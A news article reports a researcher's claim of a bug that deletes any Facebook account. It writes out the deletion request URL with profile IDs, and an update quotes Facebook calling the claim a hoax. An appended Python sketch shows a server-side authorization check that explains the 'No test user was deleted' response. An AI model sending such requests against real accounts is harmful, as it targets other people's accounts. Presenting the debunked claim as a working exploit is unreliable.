*Update: A security engineer from Facebook told Computerworld that this claim is fake.
"This is simply a hoax. The html source shown in the video clearly says 'No test user was deleted'. We've verified in our logs that the victim account was manually deactivated by visiting https://www.facebook.com/deactivate.php."
----
Speaking to E Hacking News, security researcher and bug hunter Ehraz Ahmed claimed to have found a security vulnerability that allows him to delete any Facebook account.
The researcher tried to report the bug to Facebook. However, the Facebook team rejected the finding, saying that it is not valid.
Even though the researcher sent a demo video, they denied his request.
Ehraz shared with EHN a method to exploit the bug:
Exploit for removing any account from Facebook
Vulnerable link:
https://www.facebook.com/ajax/whitehat/delete_test_users.php?fb_dtsg=AQA1E-WE&selected_users[0]=[Victim's Profile ID]&__user=[Attacker's Profile ID]&__a=1
We can get the profile ID by using
http://graph.facebook.com/[username]
Here [username] is the username of your Facebook profile.
In this demo we will be using a test profile.
Name: Rahul Agnikotri
https://www.facebook.com/hexgroup (victim's profile; this is my test profile)
We can remove any account on Facebook, including those of celebrities.
Attacker's profile ID = 1781913563
Victim's profile ID = 100001831297334
Request to delete the account:
https://www.facebook.com/ajax/whitehat/delete_test_users.php?fb_dtsg=AQA1E-WE&selected_users[0]=100001831297334&__user=1781913563&__a=1
I am just wondering how the Facebook team rejected such a critical bug. However, this is not the first time the Facebook team has rejected critical vulnerabilities. Most of the time the Facebook team fails to understand the impact of a bug, and later, when they realize the severity, they fix the bug without acknowledging the researcher.
Recently, a hacker named "Khalil" posted a vulnerability report on Mark Zuckerberg's wall after the Facebook security team rejected the bug.
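Facebook's reply quoted in the update says the response read 'No test user was deleted'. As an added illustration (not Facebook's code and not part of the original post), the sketch below shows a server-side ownership check that yields that result when a request names an account that is not the caller's own test user. The handler, data model and sample IDs are hypothetical, and treating fb_dtsg as a session-bound anti-CSRF token is an assumption.

```python
import hmac
from dataclasses import dataclass
from typing import Optional


@dataclass
class Account:
    user_id: int
    is_test_user: bool = False
    created_by: Optional[int] = None  # owner of a test user; None for real accounts
    deleted: bool = False


def sample_accounts():
    """Constructed sample data; every ID here is made up."""
    return {
        1001: Account(1001),  # real account, the requester
        2002: Account(2002),  # real account, someone else
        9001: Account(9001, is_test_user=True, created_by=1001),
        9002: Account(9002, is_test_user=True, created_by=2002),
    }


def delete_test_users(session_user_id, session_token, params, accounts):
    """Hypothetical handler: delete only test users owned by the session user."""
    # 1. Anti-CSRF token must match the one bound to the session (assumed role of fb_dtsg).
    supplied = str(params.get("fb_dtsg") or "")
    if not hmac.compare_digest(supplied.encode(), session_token.encode()):
        return {"error": "invalid token", "deleted": []}
    # 2. Identity comes from the session; a client-supplied __user is never read.
    deleted = []
    for raw_id in params.get("selected_users", []):
        try:
            target = accounts.get(int(raw_id))
        except (TypeError, ValueError):
            continue  # malformed ID: skip it
        # 3. Object-level authorization: a test user, created by the caller, not yet deleted.
        if (target and target.is_test_user and not target.deleted
                and target.created_by == session_user_id):
            target.deleted = True
            deleted.append(target.user_id)
    message = f"{len(deleted)} test user(s) deleted" if deleted else "No test user was deleted"
    return {"message": message, "deleted": deleted}


if __name__ == "__main__":
    accts = sample_accounts()
    req = {"fb_dtsg": "tok", "selected_users": ["2002"], "__user": "2002"}
    print(delete_test_users(1001, "tok", req, accts))
```

With a check like this, the response body is the signal to read: a request that names a real account or someone else's test user changes nothing and says so.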